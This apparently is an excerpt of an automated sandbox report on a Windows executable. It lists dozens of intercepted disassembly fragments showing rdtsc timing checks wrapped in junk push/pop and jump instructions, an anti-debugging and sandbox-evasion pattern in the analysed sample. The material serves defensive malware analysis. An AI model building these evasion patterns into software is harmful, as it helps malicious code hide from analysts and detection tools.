Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E4F96 second address: 8E4F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D1AB8 second address: 8D1ADC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2D810C1E56h 0x00000008 jmp 00007F2D810C1E5Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007F2D810C1E5Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3F07 second address: 8E3F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3F0B second address: 8E3F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F2D810C1E5Ch 0x0000000c jc 00007F2D810C1E62h 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E407C second address: 8E409A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E409A second address: 8E409E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E409E second address: 8E40A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E4234 second address: 8E4264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E69h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2D810C1E63h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E43B9 second address: 8E43C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E457B second address: 8E4581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E4581 second address: 8E458B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2D807904A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E458B second address: 8E458F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E6313 second address: 8E6361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F2D807904B7h 0x0000000d jng 00007F2D807904A8h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F2D807904B2h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 jl 00007F2D807904ACh 0x00000029 jne 00007F2D807904A6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E6436 second address: 8E6446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F2D810C1E56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E6446 second address: 8E64DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F2D807904AFh 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F2D807904A8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D20F7h], esi 0x0000002f push 00000000h 0x00000031 add esi, dword ptr [ebp+122D3877h] 0x00000037 mov ecx, dword ptr [ebp+122D38DFh] 0x0000003d call 00007F2D807904A9h 0x00000042 ja 00007F2D807904BFh 0x00000048 push eax 0x00000049 jmp 00007F2D807904B0h 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 pushad 0x00000053 pushad 0x00000054 jno 00007F2D807904A6h 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E64DB second address: 8E64DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E64DF second address: 8E64EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E64EC second address: 8E657E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E63h 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edi 0x00000010 jc 00007F2D810C1E58h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edi 0x00000019 pop eax 0x0000001a pushad 0x0000001b jnl 00007F2D810C1E5Bh 0x00000021 jo 00007F2D810C1E5Ch 0x00000027 mov eax, dword ptr [ebp+122D3893h] 0x0000002d popad 0x0000002e push 00000003h 0x00000030 mov dx, BE97h 0x00000034 push 00000000h 0x00000036 mov ecx, dword ptr [ebp+122D39A7h] 0x0000003c push 00000003h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F2D810C1E58h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 00000018h 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 call 00007F2D810C1E59h 0x0000005d jmp 00007F2D810C1E5Bh 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F2D810C1E5Ah 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E657E second address: 8E6603 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2D807904B1h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F2D807904B0h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007F2D807904B1h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F2D807904B6h 0x00000024 pop eax 0x00000025 jp 00007F2D807904A7h 0x0000002b cmc 0x0000002c lea ebx, dword ptr [ebp+1244A122h] 0x00000032 mov edi, dword ptr [ebp+122D3A37h] 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a pushad 0x0000003b jmp 00007F2D807904B4h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E6603 second address: 8E661B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F2D810C1E58h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F2D810C1E56h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90715C second address: 907160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 907160 second address: 90716A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2D810C1E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90716A second address: 907170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905502 second address: 905506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905FDE second address: 905FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905FE4 second address: 906007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E61h 0x00000007 jc 00007F2D810C1E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906007 second address: 906011 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2D807904B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906011 second address: 906017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D6BC8 second address: 8D6BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906269 second address: 90626D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90626D second address: 906273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906273 second address: 906293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2D810C1E56h 0x0000000a jmp 00007F2D810C1E66h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90683F second address: 90687B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jno 00007F2D807904A8h 0x00000013 jmp 00007F2D807904ADh 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F2D807904A6h 0x00000020 jmp 00007F2D807904B2h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906B77 second address: 906BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E61h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jmp 00007F2D810C1E5Fh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906BA1 second address: 906BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2D807904B4h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F2D807904B9h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906D16 second address: 906D27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F2D810C1E56h 0x00000009 jbe 00007F2D810C1E56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FAE88 second address: 8FAE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FAE91 second address: 8FAE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9101CE second address: 9101D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9101D4 second address: 9101D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910335 second address: 910350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2D807904B4h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90EA22 second address: 90EA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F2D810C1E64h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90EA45 second address: 90EA4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90EA4A second address: 90EA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910416 second address: 91042E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9142A6 second address: 9142AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9139F0 second address: 913A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904AEh 0x00000007 push ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913A0A second address: 913A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2D810C1E56h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F2D810C1E56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914118 second address: 914135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jns 00007F2D807904A6h 0x0000000c jbe 00007F2D807904A6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F2D807904A6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914135 second address: 914139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914139 second address: 91413D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91698C second address: 916990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 916990 second address: 9169EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007F2D807904ABh 0x00000013 push esi 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop esi 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push ecx 0x0000001b pushad 0x0000001c jmp 00007F2D807904B7h 0x00000021 jmp 00007F2D807904ABh 0x00000026 popad 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c jng 00007F2D807904C9h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9169EE second address: 9169F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 916F6B second address: 916F70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 917568 second address: 91756C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91756C second address: 9175E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2D807904ACh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F2D807904B1h 0x00000014 jmp 00007F2D807904B9h 0x00000019 popad 0x0000001a push ecx 0x0000001b jnl 00007F2D807904A6h 0x00000021 pop ecx 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F2D807904B0h 0x00000029 sub dword ptr [ebp+12448488h], edx 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007F2D807904AAh 0x00000038 ja 00007F2D807904A6h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9175E2 second address: 9175ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F2D810C1E56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9175ED second address: 91760A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F2D807904B0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 917817 second address: 917821 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2D810C1E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9180BF second address: 9180E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F2D807904B4h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9180E1 second address: 9180EB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2D810C1E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9180EB second address: 91812A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 cld 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F2D807904A8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D2260h], edx 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e push edx 0x0000002f push edi 0x00000030 pop edi 0x00000031 pop edx 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9189A1 second address: 9189A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91A728 second address: 91A747 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2D807904B0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jp 00007F2D807904A6h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91B093 second address: 91B097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91B097 second address: 91B09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91B09D second address: 91B110 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F2D810C1E5Ah 0x00000011 mov dword ptr [ebp+122D1D17h], ebx 0x00000017 pop esi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F2D810C1E58h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 adc edi, 31DDA4B8h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F2D810C1E58h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 mov si, E1C5h 0x0000005a push eax 0x0000005b pushad 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91BBD9 second address: 91BBDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91BBDD second address: 91BC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b mov di, 30FCh 0x0000000f push 00000000h 0x00000011 sub dword ptr [ebp+1246B61Bh], edx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2D810C1E61h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91BC08 second address: 91BC12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F2D807904A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CFFAD second address: 8CFFD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2D810C1E67h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CFFD3 second address: 8CFFDF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2D807904A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CFFDF second address: 8CFFE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CFFE5 second address: 8CFFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91E86D second address: 91E877 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9212DB second address: 9212E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9212E1 second address: 92137A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F2D810C1E58h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov edi, 587FB172h 0x00000028 jnc 00007F2D810C1E5Ch 0x0000002e movsx ebx, cx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F2D810C1E58h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d jno 00007F2D810C1E73h 0x00000053 push 00000000h 0x00000055 mov edi, dword ptr [ebp+122D388Fh] 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 push ebx 0x00000062 pop ebx 0x00000063 popad 0x00000064 rdtsc
